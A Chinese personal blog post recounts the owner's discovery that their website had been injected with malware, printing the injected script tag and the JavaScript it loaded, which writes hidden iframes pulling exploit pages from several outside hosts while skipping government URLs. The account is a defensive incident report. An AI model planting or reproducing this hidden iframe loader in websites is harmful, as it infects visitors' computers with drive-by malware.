首页 | 心情日记 | 建站心得 | 编程技术 | 大盘分析 | 股市信息 | 学习园地 | 电脑技巧 | 物流外贸 | 另类其它 | 站长推荐 | 给我留言 | 相册

用户登陆
用户:
密码:
 
不保存保存一天
保存一月保存一年

站点日历
73 2024 - 11 48
     12
3456789
10111213141516
17181920212223
24252627282930


站点统计

最新评论

日志搜索

 标题   内容


多层过滤,让广告无处藏身! 如何快速发现被挂马的文件
未知 服务器被挂马了   [ 日期:2009-11-05 11:19:04 ]   [ 来自:本站原创 ]

海外邮件中继,海外退信中继,美国高速VPS,不限流量VPN,邮局维护和管理,邮件网关,EMOS邮件中继,POSTFIX邮件中继,Winwebmail邮件中继,Winmail邮件中继,DBMail邮件中继,JDMail邮件中继,Exchange邮件中继,MDaemon邮件中继 淘宝店:http://shantan.taobao.com 云邮科技官网:www.yunrelay.com

【字体设置:
昨天晚上11点的时候,网站的访问都很正常,到了快12点的时候,我再次访问我的网站,瑞星马上就提示病毒
按此在新窗口打开图片

按照经验,马上查看了一下网站的源代码。
发现多了一下JAVA代码
<script src=http://23xzwwd1.count.xj.cn/images/images/1.css></script> 
这家伙很聪明,以为用CSS代替JS就没人发现了,于是我把文件下载下来,发现了以下的内容:
if(document.location.href.indexOf("gov")>=0)
{} else {
document.write("<div style='display:none'>")
document.write("<iframe src=http://thankyou1.count.xj.cn/images/images/mepeg.htm></iframe>")
document.write("<iframe src=http://niquanjia1fzl.count.xj.cn/images/images/tj.htm></iframe>")
document.write("<iframe src=http://quanj2ia.count.xj.cn/images/images/ff.htm></iframe>")
document.write("<iframe src=http://imso3rry.count.xj.cn/images/images/of.htm></iframe>")
document.write("<iframe src=http://goodebye.count.xj.cn/images/images/bf.htm></iframe>")
document.write("</div>")}
聪明的家伙,在检测网址的时候,还过滤了GOV的,毕竟GOV是官方的网站,随便挂马的话是被查的。
我用源码查看器去访问了那些页面,把代码都弄了下来了,有图片木马,有攻击统计网站的代码,还有攻击播放器的代码,NND,这杂种还真够狠的!

还好,现在已经处理好了。网页没有被修改,而是服务器出问题。


暂时没有评论
   发表评论 - 不要忘了输入验证码哦!
作者: 用户:  密码:  我要注册 验证码: 
为防止广告注册机程序,验证码不会自动显示,请点击此处显示或者(刷新)验证码!
评论:

禁止表情
禁止UBB
禁止图片
识别链接
识别关键字
确定发布?
最多可以输入200个字,目前你已经输入了0个字;你今日还可以发表10条评论!
 
   

CopyRight © 2008-2010 广东金融学院030904班 All Rights Reserved
Powered by www.030904.com